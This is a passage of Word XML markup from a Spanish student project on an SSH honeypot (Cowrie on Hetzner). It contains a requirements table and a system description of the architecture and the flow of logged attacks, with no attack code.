            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Clasificar actividad observada con MITRE ATT&amp;CK</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R05F01T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cada técnica mapeada con ID y evidencia del log</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R05F01T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Redactar informe de resumen ejecutivo</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R05F01T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Informe revisado y coherente</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R05F01T03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Incluir recomendaciones de defensa</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R05F01T03P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cada técnica acompañada de mitigación</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shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Integración con SIEM (Wazuh)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R06F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ingesta de logs en Wazuh (opcional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R06F01T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Instalar Wazuh 4.9.2 en VM local</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R06F01T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Dashboard Wazuh accesible en navegador</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R06F01T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Configurar ingesta de cowrie.json</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R06F01T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Eventos de Cowrie visibles en Wazuh Discover</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shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Documentación y entrega</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">REQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:color="E2EFDA" w:val="solid"/>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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R07F01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Redactar memoria del proyecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R07F01T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Redactar memoria siguiendo plantilla Prometeo</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R07F01T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Documento cumple estructura y formato APA</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R07F01T02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Incluir capturas, gráficas y diagramas</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R07F01T02P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Todas las figuras referenciadas y visibles</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bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">R07F02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gestionar repositorio GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">FUNC</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R07F02T01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mantener repositorio PFC-Cowrie con README y commits</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R07F02T01P01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Repositorio público con historial de commits</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bl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción del Sistema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Arquitectura General</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La arquitectura del sistema se organiza en tres zonas diferenciadas, como muestra la Figura 1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zona Internet: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">los atacantes (bots y botnets) conectan al puerto 22 de la IP pública. Desde esta zona también opera Kali Linux para pruebas controladas. El administrador accede por el puerto 2022.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zona Hetzner Cloud: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">el servidor Ubuntu 24.04 (CX23, 2 vCPU x86, 4 GB RAM, en Núremberg) ejecuta iptables como firewall del host y para la redirección NAT del puerto 22 al 2222, Cowrie como honeypot y OpenSSH en el puerto 2022 para administración real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zona Laboratorio Local: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">los logs se descargan por SSH (puerto 2022) y se analizan con el script Python (cowrie_analyzer.py). Opcionalmente se ingestan en Wazuh (SIEM). Se genera el informe de inteligencia con mapeo MITRE ATT&amp;CK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Arquitectura del honeypot SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4762500" cy="31908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3190875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Flujo de Datos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El flujo de un ataque típico sigue estos pasos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El atacante (bot) descubre la IP pública mediante escaneo masivo de Internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Envía una conexión SSH al puerto 22 de la IP pública del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El Cloud Firewall de Hetzner admite el tráfico al puerto 22. Ya en el servidor, la regla NAT PREROUTING de iptables redirige la conexión al puerto 2222, donde escucha Cowrie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie presenta un banner SSH y acepta intentos de autenticación. Cada intento (exitoso o fallido) se registra en cowrie.json con la IP de origen, usuario, contraseña y timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Si Cowrie permite el acceso (configurable), el atacante interactúa con un filesystem falso. Los comandos ejecutados se registran como eventos cowrie.command.input.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Si el atacante intenta descargar malware (wget, curl), Cowrie registra la URL y el hash SHA del fichero como evento cowrie.session.file_download.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
